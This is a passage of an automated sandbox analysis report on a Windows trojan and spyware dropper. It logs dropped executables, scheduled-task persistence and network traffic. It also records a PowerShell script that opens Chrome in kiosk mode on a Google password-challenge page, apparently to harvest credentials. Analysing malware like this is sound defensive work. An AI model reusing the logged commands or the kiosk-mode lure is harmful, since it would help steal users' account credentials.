Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.3t3OrN2aQC0.es
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
Source: chrome.exe, 0000000A.00000003.2253056913.0000713801070000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/ghelp/
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/api/main.min.js
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/inproduct_help/service/lazy.min.js
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/
Source: chrome.exe, 0000000A.00000002.4519199941.00003FCC02348000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358387820.00003FCC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2362415537.00003FCC0376C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358243438.00003FCC024B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.4206040164.00003FCC039A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358297327.00003FCC0371C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/support/content/
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/support/content/;report-uri
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/live/
Source: chrome.exe, 0000000A.00000003.4205958155.00003FCC0391C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2254808906.0000713800820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
Source: chrome.exe, 0000000A.00000003.2243572361.0000713800A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.privacysandbox.comb
Source: chrome.exe, 0000000A.00000002.4513098457.0000020C0B0F7000.00000002.00000001.00040000.0000002B.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
Source: chrome.exe, 0000000A.00000003.2358149722.00003FCC034C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346939266.00003FCC02EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2367595616.00003FCC03784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358387820.00003FCC0355C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2362415537.00003FCC0376C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2358243438.00003FCC024B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2347060438.00003FCC034DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2FpwdX-
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2FpwdYo
Source: chrome.exe, 0000000A.00000002.4518934007.00003FCC022DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd&feature=redirec
Source: chrome.exe, 0000000A.00000003.2358297327.00003FCC0371C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526n
Source: powershell.exe, 00000008.00000002.2238229966.0000000005253000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.LR
Source: chrome.exe, 0000000A.00000002.4519274085.00003FCC0236C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.4518817300.00003FCC0228C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: chrome.exe, 0000000A.00000003.2346703166.00003FCC02828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: chrome.exe, 0000000A.00000002.4519237628.00003FCC02360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd%2Fchallenge%2Fpwd3F
Source: chrome.exe, 0000000A.00000002.4516459899.00001F7C00238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--kiosk--user-data-d
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdYouTube
Source: chrome.exe, 0000000A.00000002.4510929381.0000020C08E83000.00000002.00000001.00040000.0000001B.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdYouTube/
Source: chrome.exe, 0000000A.00000002.4511769864.0000020C08FC0000.00000002.00000001.00040000.0000001E.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdg
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50774
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54583
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54581
Source: unknown Network traffic detected: HTTP traffic on port 54564 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54581 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 50792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 54583 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54565 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50791
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 50767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50801
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50767
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54565
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50807
Source: unknown Network traffic detected: HTTP traffic on port 50774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49786 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: random[1].exe.3.dr Static PE information: section name:
Source: random[1].exe.3.dr Static PE information: section name: .rsrc
Source: random[1].exe.3.dr Static PE information: section name: .idata
Source: random[1].exe.3.dr Static PE information: section name:
Source: 6b11689b40.exe.3.dr Static PE information: section name:
Source: 6b11689b40.exe.3.dr Static PE information: section name: .rsrc
Source: 6b11689b40.exe.3.dr Static PE information: section name: .idata
Source: 6b11689b40.exe.3.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006BCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_006BCB97
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0015CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 1_2_0015CB97
Creates files inside the system directory
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\sets.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\manifest.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\LICENSE Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\_metadata\ Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\_metadata\verified_contents.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6968_731799293\manifest.fingerprint Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Deletes files inside the Windows folder
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File deleted: C:\Windows\SystemTemp\chrome_BITS_6968_1660607800 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006AAA09 0_2_006AAA09
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A9A00 0_2_006A9A00
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E7049 0_2_006E7049
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E31A8 0_2_006E31A8
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006C6192 0_2_006C6192
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006C1602 0_2_006C1602
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E779B 0_2_006E779B
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E8860 0_2_006E8860
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E78BB 0_2_006E78BB
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A4B30 0_2_006A4B30
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E2D10 0_2_006E2D10
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A4DE0 0_2_006A4DE0
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006C3DF1 0_2_006C3DF1
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006C0E13 0_2_006C0E13
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006D7F36 0_2_006D7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00149A00 1_2_00149A00
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00187049 1_2_00187049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00166192 1_2_00166192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_001831A8 1_2_001831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00161602 1_2_00161602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0018779B 1_2_0018779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00188860 1_2_00188860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_001878BB 1_2_001878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00144B30 1_2_00144B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00182D10 1_2_00182D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00163DF1 1_2_00163DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00144DE0 1_2_00144DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00160E13 1_2_00160E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00177F36 1_2_00177F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\1000113001\num.exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0015DF80 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 001580C0 appears 131 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0015D942 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: String function: 000545C0 appears 316 times
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: String function: 006BD942 appears 83 times
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: String function: 006B80C0 appears 131 times
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: String function: 006BDF80 appears 43 times
Uses 32bit PE files
Source: 4qIl08vrFY.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random[1].exe.3.dr Static PE information: Section: ipavvigs ZLIB complexity 0.9948537919551474
Source: 6b11689b40.exe.3.dr Static PE information: Section: ipavvigs ZLIB complexity 0.9948537919551474
Source: skotes.exe, 00000003.00000002.4503861250.0000000003ED5000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000004.00000000.2108609049.000000000006E000.00000002.00000001.01000000.0000000A.sdmp, num.exe, 00000004.00000002.2121590739.000000000006E000.00000002.00000001.01000000.0000000A.sdmp, 6b11689b40.exe, 00000005.00000003.2172652272.0000000005590000.00000004.00001000.00020000.00000000.sdmp, 6b11689b40.exe, 00000005.00000002.2212980719.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@64/23@24/18
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00069600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 4_2_00069600
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006AAA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA, 0_2_006AAA09
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: 4qIl08vrFY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 0000000A.00000002.4510882016.0000020C08E60000.00000002.00000001.00040000.00000019.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 0000000A.00000003.2288087540.00003FCC02C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.4511416310.0000020C08EB5000.00000002.00000001.00040000.0000001C.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 4qIl08vrFY.exe Virustotal: Detection: 63%
Source: 4qIl08vrFY.exe ReversingLabs: Detection: 68%
Source: 6b11689b40.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6b11689b40.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6b11689b40.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\4qIl08vrFY.exe File read: C:\Users\user\Desktop\4qIl08vrFY.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\4qIl08vrFY.exe "C:\Users\user\Desktop\4qIl08vrFY.exe"
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000113001\num.exe "C:\Users\user\AppData\Local\Temp\1000113001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000115002\6b11689b40.exe "C:\Users\user\1000115002\6b11689b40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1000140041\ko.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2256 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\1000115002\6b11689b40.exe "C:\Users\user\1000115002\6b11689b40.exe"
Source: unknown Process created: C:\Users\user\1000115002\6b11689b40.exe "C:\Users\user\1000115002\6b11689b40.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=4920 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=4812 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000113001\num.exe "C:\Users\user\AppData\Local\Temp\1000113001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000115002\6b11689b40.exe "C:\Users\user\1000115002\6b11689b40.exe" Jump to behavior
